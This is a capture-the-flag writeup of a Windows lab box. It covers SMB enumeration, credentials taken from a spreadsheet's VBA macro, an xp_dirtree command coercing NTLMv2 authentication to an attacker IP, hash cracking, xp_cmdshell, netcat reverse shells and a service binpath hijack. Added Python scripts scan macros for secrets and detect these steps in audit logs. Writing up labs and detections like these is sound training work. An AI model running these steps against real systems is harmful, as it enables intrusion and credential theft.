My Attempt
User.txt
Enumeration
From my Nmap scan, I have discovered the following ports

First, I tried to log in to the MSSQL service using the username "sa" and a couple of common passwords (sa, admin, password, etc.). Unfortunately, none of these common credentials could log in to the service. I also tried to research exploits based on the MSSQL version, but had no luck there either.
Then I started to enumerate SMB with smbclient. This is where I made my mistake and got stuck.

The mistake I made was that I tried to access the SMB share with a null session (-U "" -N), which does not show any shares on the server. From here I thought that maybe the server was vulnerable to the EternalBlue (MS17-010) exploit since an SMB null session was allowed, but the Metasploit auxiliary module proved me wrong.
Following Writeup
In the walkthrough video from the TCM Security course, the tutor was able to list shared folders on the SMB service. It seems that the shares were accessible when an empty password was provided. Using smbclient myself, I was able to find an uncommon share folder, "Reporting".

Stored Credentials in Spreadsheet
Inside the Reports share folder, there is an Excel spreadsheet.

I tried to open the spreadsheet with the LibreOffice suite, but there seemed to be no content in it.
Following the walkthrough video, I used the binwalk command to list and extract the files inside the spreadsheet.

Among the extracted files, there is a .bin file that relates to a VBA script.

I used the strings command to list the contents of the .bin file, and some credentials were found. It seems the credentials "reporting:PcwTWTHRwryjc$c6" could be used to connect to the database service.
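The binwalk/strings step above is, from a defender's side, a secret scan of the macro storage inside an Office file. The following Python script is an added example that is not part of the original writeup or the course material: it opens an OOXML workbook as the zip archive it is, pulls any vbaProject.bin member, and flags credential-like fields in its printable strings, so a file share can be audited for hard-coded database logins before an attacker finds them. The workbook it scans is constructed in memory with placeholder values; real vbaProject.bin module streams are MS-OVBA compressed, so this plain-text pass is a first-line heuristic rather than a VBA decompiler.

```python
from __future__ import annotations
import io
import re
import zipfile

# Heuristic patterns for credential-like fields in macro text: (field name, value).
SECRET_PATTERNS = [
    re.compile(r"(?i)\b(password|pwd)\s*=\s*([^;\"'\s]+)"),
    re.compile(r"(?i)\b(user id|uid)\s*=\s*([^;\"'\s]+)"),
]


def extract_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Rough equivalent of the `strings` utility: runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def find_macro_secrets(office_file: bytes) -> list[tuple[str, str, str]]:
    """Open an OOXML document (a zip) and scan any vbaProject.bin member for
    credential-like fields. Returns (member name, field, value) triples."""
    hits: list[tuple[str, str, str]] = []
    with zipfile.ZipFile(io.BytesIO(office_file)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith("vbaproject.bin"):
                continue
            for s in extract_strings(zf.read(name)):
                for pat in SECRET_PATTERNS:
                    for field, value in pat.findall(s):
                        hits.append((name, field.lower(), value))
    return hits


def build_sample_workbook() -> bytes:
    """Constructed sample: a minimal zip laid out like a macro-enabled workbook.
    The macro body and its credential values are placeholders, not real data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        macro = (
            b"\x00\x01Attribute VB_Name = \"Module1\"\x00"
            b"conn.Open \"Provider=SQLOLEDB;Server=10.0.0.5;"
            b"User ID=reporting;Password=EXAMPLE_PLACEHOLDER\"\x00"
        )
        zf.writestr("xl/vbaProject.bin", macro)
    return buf.getvalue()


if __name__ == "__main__":
    for member, field, value in find_macro_secrets(build_sample_workbook()):
        print(f"{member}: {field} = {value}")
```

Run it over every .xlsm/.docm found on a share and anything it reports is a credential that should be rotated and moved out of the document; a reporting workbook that needs database access should authenticate with a connection the macro does not carry in plain text.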

Using the credentials, I was able to log in to the MSSQL server as the user "reporting".

Escalating Privilege to MSSQL Service Account
Although I had logged into the SQL server, I did not have the privilege to enable xp_cmdshell to execute system commands.

The walkthrough video suggests that we can use the xp_dirtree command to grab the NTLMv2 hash of the MSSQL service account. The first step is to host a simple SMB service on my own machine using smbserver.py from Impacket.

Then, from the MSSQL terminal, I issued the command "EXEC master.sys.xp_dirtree '\\10.10.14.9\share',1,1" to make the server connect to my SMB share.

From the smbserver.py terminal, we obtained the NTLMv2 hash of the mssql_svc account.

Then I saved the hash and cracked it using John the Ripper. The result shows the cleartext password, which is "corporate568".

Using the credentials "mssql-svc:corporate568", I was able to log in to the SQL service and enable xp_cmdshell. Now I can execute arbitrary commands.
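The escalation above leaves two distinct traces on the database side: an extended stored procedure being pointed at a UNC path on a host the server has no business talking to, and xp_cmdshell being switched on and then used. As an added example that is not part of the original writeup, the Python below runs simple detection rules over a constructed set of simplified audit records (timestamp, login, statement; both the format and the entries are made up for this illustration). The allowlist of trusted UNC hosts is an assumption a real deployment would fill in from its own file servers.

```python
from __future__ import annotations
import re

# Constructed sample of simplified audit records: "<timestamp> <login> <statement>".
# The format and the entries are made up for this illustration.
SAMPLE_AUDIT = r"""
2019-03-10T11:02:13Z reporting SELECT name FROM master.sys.databases
2019-03-10T11:03:41Z reporting EXEC master.sys.xp_dirtree '\\10.10.14.9\share',1,1
2019-03-10T11:09:02Z mssql-svc EXEC sp_configure 'show advanced options', 1; RECONFIGURE
2019-03-10T11:09:05Z mssql-svc EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE
2019-03-10T11:09:30Z mssql-svc EXEC xp_cmdshell 'whoami'
2019-03-10T11:15:00Z backup_job EXEC master.sys.xp_dirtree '\\fileserver01\backups',1,1
"""

# Assumed allowlist: UNC hosts the instance is legitimately expected to reach.
TRUSTED_UNC_HOSTS = {"fileserver01"}

# Extended procedures that make the SQL Server service account authenticate to a path,
# capturing the host part of a '\\host\share' argument.
UNC_PROC = re.compile(r"(?i)\b(xp_dirtree|xp_fileexist|xp_subdirs)\b[^']*'\\\\([^\\']+)")
# Turning the shell procedure on, and any later use of it.
CMDSHELL_ENABLE = re.compile(r"(?i)sp_configure\s+'xp_cmdshell'\s*,\s*1\b")
CMDSHELL_USE = re.compile(r"(?i)\bxp_cmdshell\b")


def detect(audit_text: str) -> list[dict]:
    """Return one alert dict per matching record, in audit order."""
    alerts: list[dict] = []
    for line in audit_text.splitlines():
        if not line.strip():
            continue
        ts, login, stmt = line.split(" ", 2)
        m = UNC_PROC.search(stmt)
        if m and m.group(2).lower() not in TRUSTED_UNC_HOSTS:
            alerts.append({"time": ts, "login": login,
                           "rule": "unc_to_untrusted_host", "detail": m.group(2)})
        if CMDSHELL_ENABLE.search(stmt):
            alerts.append({"time": ts, "login": login,
                           "rule": "xp_cmdshell_enabled", "detail": stmt})
        elif CMDSHELL_USE.search(stmt):
            alerts.append({"time": ts, "login": login,
                           "rule": "xp_cmdshell_executed", "detail": stmt})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_AUDIT):
        print(f"{a['time']} {a['login']:<10} {a['rule']:<24} {a['detail']}")
```

The UNC rule fires at the coercion step, before any hash has been captured or cracked, which is also the point where blocking outbound SMB (TCP 445) from the database host to untrusted networks and running the instance under a low-privilege or virtual service account limits what a leaked authentication is worth.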

Reverse Shell with Netcat
There are multiple ways to obtain a reverse shell through command execution. Here I chose to use netcat to create a reverse shell from the server.
First I uploaded nc.exe to the server: I hosted a simple HTTP server using Python and then downloaded the file from the MSSQL client terminal.


Then I set up a listener on my machine and issued the netcat command to obtain a reverse shell.


The user.txt file is found on the desktop of the mssql-svc user.

Root.txt
Scanning Vulnerability (Following Writeup)
At first I tried to use WinPEAS to scan for vulnerabilities, but the results did not seem to help. In the walkthrough video, the PowerUp.ps1 script is used to discover a vulnerability.
When I used the PowerShell script, my results seemed a bit different from the video's. This might be because the video uses an older version of the script. From my results, the first obvious discovery is the password of the Administrator account.

From the Nmap scan at the beginning, port 5985 is open, which is the common port for Windows Remote Management. This suggests that I might be able to log in remotely using these credentials. I used evil-winrm and successfully logged in to the server as administrator.

The root.txt file can be found on the administrator's desktop.

Other Path for Privilege Escalation
In the video, the privilege escalation method used is to change the binpath configuration of a service and restart the service to obtain another reverse shell with administrator privileges. From my script output, the vulnerable service is shown below.

To obtain a reverse shell, we can first change the binpath configuration of that service. Before doing so, the original configuration is shown below.

Now we change the binary path name to a reverse shell command using nc.exe, then verify that the configuration was changed successfully.

With another listener set up on the Kali machine (port 4444), we can obtain the reverse shell by restarting the service.

